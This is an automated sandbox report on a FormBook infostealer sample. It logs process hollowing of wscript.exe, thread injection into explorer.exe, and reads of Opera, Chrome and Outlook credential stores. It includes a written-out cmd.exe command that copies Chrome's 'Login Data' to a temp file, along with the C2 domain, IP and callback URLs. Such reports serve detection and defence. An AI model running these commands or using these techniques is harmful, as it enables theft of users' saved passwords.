Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BBE539 mov eax, dword ptr fs:[00000030h] 24_2_04BBE539
Enables debug privileges
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_000E6217 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 29_2_000E6217
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_000E572D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 29_2_000E572D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_000F3B93 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 29_2_000F3B93
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 32_2_6E52F79B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 32_2_6E52F79B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 32_2_6E5347B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 32_2_6E5347B3
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 32_2_6E5301F3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 32_2_6E5301F3

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 161.47.48.3 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.ordertds.com
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread register set: target process: 3388 Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Thread register set: target process: 3388 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Section unmapped: C:\Windows\SysWOW64\wscript.exe base address: A30000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V Jump to behavior
Source: explorer.exe, 00000013.00000002.461744913.0000000001398000.00000004.00000020.sdmp Binary or memory string: ProgmanamF
Source: explorer.exe, 00000013.00000000.329272246.0000000001980000.00000002.00000001.sdmp, wscript.exe, 00000018.00000002.463458339.0000000003380000.00000002.00000001.sdmp, player-toolkit.exe, 0000001D.00000002.463658512.00000000013A0000.00000002.00000001.sdmp, player-toolkit.exe, 00000020.00000002.462945107.0000000001B20000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000013.00000000.329272246.0000000001980000.00000002.00000001.sdmp, wscript.exe, 00000018.00000002.463458339.0000000003380000.00000002.00000001.sdmp, player-toolkit.exe, 0000001D.00000002.463658512.00000000013A0000.00000002.00000001.sdmp, player-toolkit.exe, 00000020.00000002.462945107.0000000001B20000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000013.00000000.329272246.0000000001980000.00000002.00000001.sdmp, wscript.exe, 00000018.00000002.463458339.0000000003380000.00000002.00000001.sdmp, player-toolkit.exe, 0000001D.00000002.463658512.00000000013A0000.00000002.00000001.sdmp, player-toolkit.exe, 00000020.00000002.462945107.0000000001B20000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000013.00000000.329272246.0000000001980000.00000002.00000001.sdmp, wscript.exe, 00000018.00000002.463458339.0000000003380000.00000002.00000001.sdmp, player-toolkit.exe, 0000001D.00000002.463658512.00000000013A0000.00000002.00000001.sdmp, player-toolkit.exe, 00000020.00000002.462945107.0000000001B20000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_000E552B cpuid 29_2_000E552B
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 29_2_00104062
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: GetLocaleInfoW, 29_2_000FC230
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 29_2_00103701
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: EnumSystemLocalesW, 29_2_001039A3
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: EnumSystemLocalesW, 29_2_001039EE
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: EnumSystemLocalesW, 29_2_00103A89
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: EnumSystemLocalesW, 29_2_000FBCCE
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 29_2_00103E8D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: GetLocaleInfoW, 32_2_6E54EF27
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: EnumSystemLocalesW, 32_2_6E54EC49
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 32_2_6E54ECD4
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: EnumSystemLocalesW, 32_2_6E54EB63
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: GetLocaleInfoW, 32_2_6E544B0D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: EnumSystemLocalesW, 32_2_6E54EBAE
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 32_2_6E54E8C1
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: EnumSystemLocalesW, 32_2_6E5445EB
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 32_2_6E54F222
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 32_2_6E54F04D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: GetLocaleInfoW, 32_2_6E54F153
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_00040400 GetSystemTimeAsFileTime, 29_2_00040400
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_00100124 _free,_free,_free,GetTimeZoneInformation,_free, 29_2_00100124
Source: C:\Users\user\Desktop\focus.exe Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403348

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf, type: DROPPED
Source: Yara match File source: 2.2.player-toolkit.exe.10000.0.unpack, type: UNPACKEDPE
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Tries to steal Mail credentials (via file access)
Source: C:\Windows\SysWOW64\wscript.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf, type: DROPPED
Source: Yara match File source: 2.2.player-toolkit.exe.10000.0.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 412792 Sample: focus.com Startdate: 12/05/2021 Architecture: WINDOWS Score: 100 53 Found malware configuration 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 Antivirus detection for URL or domain 2->57 59 6 other signatures 2->59 10 focus.exe 21 2->10         started        process3 file4 39 C:\Users\user\AppData\...\player-toolkit.exe, PE32 10->39 dropped 41 C:\Users\user\AppData\...\libdisplay4-1.dll, PE32 10->41 dropped 43 C:\Users\user\AppData\...\instructions.pdf, PDF 10->43 dropped 45 2 other files (none is malicious) 10->45 dropped 13 player-toolkit.exe 10->13         started        process5 signatures6 69 Multi AV Scanner detection for dropped file 13->69 71 Detected unpacking (changes PE section rights) 13->71 73 Machine Learning detection for dropped file 13->73 75 5 other signatures 13->75 16 explorer.exe 3 13->16 injected process7 dnsIp8 47 ordertds.com 161.47.48.3, 49747, 49748, 49749 RACKSPACEUS United States 16->47 49 www.ordertds.com 16->49 51 System process connects to network (likely due to code injection or exploit) 16->51 20 wscript.exe 1 18 16->20         started        24 player-toolkit.exe 16->24         started        26 player-toolkit.exe 16->26         started        28 autochk.exe 16->28         started        signatures9 process10 file11 35 C:\Users\user\AppData\...\0NNlogrv.ini, data 20->35 dropped 37 C:\Users\user\AppData\...\0NNlogri.ini, data 20->37 dropped 61 Detected FormBook malware 20->61 63 Tries to steal Mail credentials (via file access) 20->63 65 Tries to harvest and steal browser information (history, passwords, etc) 20->65 67 3 other signatures 20->67 30 cmd.exe 2 20->30         started        signatures12 process13 signatures14 77 Tries to harvest and steal browser information (history, passwords, etc) 30->77 33 conhost.exe 30->33         started        process15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
161.47.48.3
 ordertds.com United States
19994 RACKSPACEUS true

Contacted Domains

Name IP Active
ordertds.com 161.47.48.3 true
www.ordertds.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.ordertds.com/vns/ true
  • Avira URL Cloud: safe
 unknown
www.hollandhousedesigns.design/vns/ true
  • Avira URL Cloud: safe
 low
http://www.ordertds.com/vns/?BlP=7+ZKUnh4u9UMtKwB98gwx/ZO0djsvR0w/TFw058Z3BgI+IMtx40n++NUyS4P23cT16Wd&vFNL=UFNx8bfpixDd true
  • Avira URL Cloud: safe
 unknown